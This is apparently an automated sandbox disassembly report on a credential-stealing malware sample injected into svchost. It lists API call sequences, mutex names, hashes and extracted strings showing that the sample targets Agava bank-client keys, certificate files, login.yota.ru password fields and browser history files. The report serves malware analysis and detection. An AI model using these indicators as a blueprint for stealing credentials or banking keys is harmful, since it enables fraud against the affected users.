                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E597
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8E5A1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8E5D7
                                                                                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 02C8E651
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E662
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C8E673
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E67A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E68C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E69C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6AE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8E6B1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6BE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8E6C1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                            • String ID: 6d1da208$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\*.bk$keys\$path.txt
                                                                                                                                                                                                            • API String ID: 959110331-648450359
                                                                                                                                                                                                            • Opcode ID: 1da50f901f1b2a8d493264affff5fc432652e40cbd1404d00f32b51ac39a5e99
                                                                                                                                                                                                            • Instruction ID: 6466789fbf7a30f9a499f4654a09d8404d133709c81ab2713913d2c9a38732de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1da50f901f1b2a8d493264affff5fc432652e40cbd1404d00f32b51ac39a5e99
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2911870E4468A9FE7129FB4982D7AB7BE8EF89309F148695F845D7301EB30CA05C790
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: IsUserAnAdmin.SHELL32 ref: 02C76CDA
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D11
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D29
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7556F380), ref: 02C76D4B
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7556F380), ref: 02C76D71
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7556F380), ref: 02C76DFD
                                                                                                                                                                                                              • Part of subcall function 02C76CD0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7556F380), ref: 02C76E04
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77155
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C77162
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77174
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7717D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77195
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C771A7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C771B2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C771B5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771C2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C771C5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C771D2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C771D5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771E2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C771E5
                                                                                                                                                                                                            • SetCaretBlinkTime.USER32(000000FF), ref: 02C771F7
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02C77225
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(00000000,92F35F16a,92f35f97a), ref: 02C77255
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C77265
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C77268
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77275
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C77278
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,92F35F16a,92f35f97a), ref: 02C77285
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C77288
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77295
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C77298
                                                                                                                                                                                                            • Sleep.KERNEL32(00001388,92F35F16a,92f35f97a), ref: 02C772A3
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02C772D5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 02C772F5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7730D
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7731F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77342
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7735C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                            • String ID: 92F35F16a$92f35f97a$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                            • API String ID: 2871222221-1101217650
                                                                                                                                                                                                            • Opcode ID: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
                                                                                                                                                                                                            • Instruction ID: 355d3170b7eb5f5d60cfc9c333afc7f07641622d6f6c910446bbb4ad717ae0df
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC51E331E84798ABE722AB709C0CF2BBB6CAF84B55F044B54F919C7181DB74D9148BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8B27F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B2B7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B2F7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B301
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B309
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B31A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B321
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,crypto), ref: 02C8B333
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.cer), ref: 02C8B346
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.pub), ref: 02C8B357
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8B3A2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8B3AF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: 6D1DA3E6$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                            • API String ID: 3980609930-283758916
                                                                                                                                                                                                            • Opcode ID: 8d69909094daf1b09538030effbc9798d8e4e2f7ea46bc0f6493ce76d0cedd48
                                                                                                                                                                                                            • Instruction ID: 5ad5ee6bccef20e133d7fc16b21af62fb9397bf821c6795b30a19155e8360a8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d69909094daf1b09538030effbc9798d8e4e2f7ea46bc0f6493ce76d0cedd48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98912631D402999FDB16AB749C59BEA7BE8AFC570CF04C698E94AD7240DB70DE04CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92B49
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C92C2C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92C57
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C92C91
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C92C9B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C92CA3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92CB4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C92CBB
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92CC8
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},02C8753A,02C8753B), ref: 02C92CFE
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C92D0F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C92D16
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02C8753A), ref: 02C92D28
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C92D39
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
                                                                                                                                                                                                            • String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$P0Wu$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
                                                                                                                                                                                                            • API String ID: 1263884631-2805521981
                                                                                                                                                                                                            • Opcode ID: 08561d88b8cbc3e258832f2eacacf9f89692b588722b0ab1872e5e37efeff1f5
                                                                                                                                                                                                            • Instruction ID: 93fde4a2732c95acd5d75c4d9674dba764e2e6ed506e508d1241570a2ef67f6d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08561d88b8cbc3e258832f2eacacf9f89692b588722b0ab1872e5e37efeff1f5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D651E031A406596BEF229B349C1CBAA3B9CAF85349F144A94ECC6D7140DF71C648CBA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,75572F00,00000000,75570F00), ref: 02C75405
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C7543F
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C7544C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C7546B
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02C7548C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,02C82665,00000001), ref: 02C7550B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7550E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7551B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7551E
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C75533
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FilePath$FolderProcess$AttributesBackslashCreateDeleteFreeValidate
                                                                                                                                                                                                            • String ID: \History.IE5\index.dat$\Opera\Opera\global_history.dat$\Opera\Opera\typed_history.xml$http$http$http$links.log
                                                                                                                                                                                                            • API String ID: 772302041-762728116
                                                                                                                                                                                                            • Opcode ID: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                            • Instruction ID: 22586ef335f1538914494fa27962e674e6c067f21e5578ca48d3104f23decb94
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B913B70E40359ABDB22CF60DC84FEABBB9EF44744F844584E945AB180DB70AB45CB90
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: P0Wu$open$taskmgr
                                                                                                                                                                                                            • API String ID: 0-1571188809
                                                                                                                                                                                                            • Opcode ID: 51c55ab250984b1378fc020d1e451df96e5a679c7bc0090d7aa38ddf5273bc60
                                                                                                                                                                                                            • Instruction ID: c90015fce84a43227881360fce1100c2b29f9ed26db122529d9413665eac2634
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51c55ab250984b1378fc020d1e451df96e5a679c7bc0090d7aa38ddf5273bc60
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B91C431A80284EBD712DF69ED49FABBB7CEBC5711F104B95F90597281C730A961CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                              • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02C91BC6
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C91BE5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91BF7
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91C08
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02C91C50
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C91C64
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02C91CA4
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C91CB2
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C91CC7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C91D64
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C91D9D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID: .ini$6d1da6b7$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Wu$UseToken$keys.zip$keys_path.txt
                                                                                                                                                                                                            • API String ID: 2651364649-579338516
                                                                                                                                                                                                            • Opcode ID: f157bce3519caa51ccfa1cf44a88d0117712d04f1532c881308efa320934b9bd
                                                                                                                                                                                                            • Instruction ID: 8530997ed578a2fdf82a443dd6cfe597021f2c815232704f86ca57ebae2b196d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f157bce3519caa51ccfa1cf44a88d0117712d04f1532c881308efa320934b9bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15A1193194429E8FDF17CB249C5DBEA7BE9EF45300F1846E4E949D7240EBB19A48CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C89F18
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6d1da3b2$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu$path.txt
                                                                                                                                                                                                            • API String ID: 2920098687-997701514
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C89F18
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6d1da3b2$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu$path.txt
                                                                                                                                                                                                            • API String ID: 2920098687-997701514
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C906FE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C9073F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C9077B
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,6d1da7aa), ref: 02C90790
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C9079A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C907A2
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C907B3
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C907BA
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C907F2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C907FF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa,?,?), ref: 02C90847
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: 6d1da7aa$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 1668326001-4290117164
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8EB7E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA248), ref: 02C8EBAB
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8EBED
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8EBF3
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8EBFB
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8EC0C
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8EC13
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA248,?,?), ref: 02C8EC87
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C8ECC5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
